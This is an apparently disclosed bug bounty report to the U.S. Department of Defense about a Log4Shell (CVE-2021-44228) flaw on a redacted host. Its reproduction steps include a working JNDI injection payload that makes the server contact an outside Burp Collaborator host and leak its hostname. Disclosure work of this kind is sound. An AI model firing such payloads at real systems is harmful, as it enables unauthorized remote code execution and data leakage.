Log4Shell: RCE 0-day exploit on █████████
Critical
U
U.S. Dept Of Defense
Submitted None
Actions:
Reported by
mr_x_strange
Vulnerability Details
Technical details and impact analysis
Hi team,
log4 shell is recent 0-day exploit it's Java package vulnerable. ██████████ domain is vulnerable
## Impact
RCE
## System Host(s)
█████████
## Affected Product(s) and Version(s)
## CVE Numbers
CVE-2021-44228
## Steps to Reproduce
1. Go to this url => https://███████/██████=%24%7bjndi%3aldap%3a%2f%2fx%24%7bhostName%7d.LOG45200SSRF.xxxxxx.burpcollaborator.net%2fa%7d
2. paste the poc code on ██████ url parameter
3. like this => https://██████████/██████
4. then burp collaborator received reverse ping back
5. I attached poc videos and photos below
##POC CODE
${jndi:ldap://x${hostName}.log4j.xxxxxxx.burpcollaborator.net/a}
## Suggested Mitigation/Remediation Actions
https://www.lunasec.io/docs/blog/log4j-zero-day/
Related CVEs
Associated Common Vulnerabilities and Exposures
CVE-2021-44228
UNKNOWN
Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from …
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Code Injection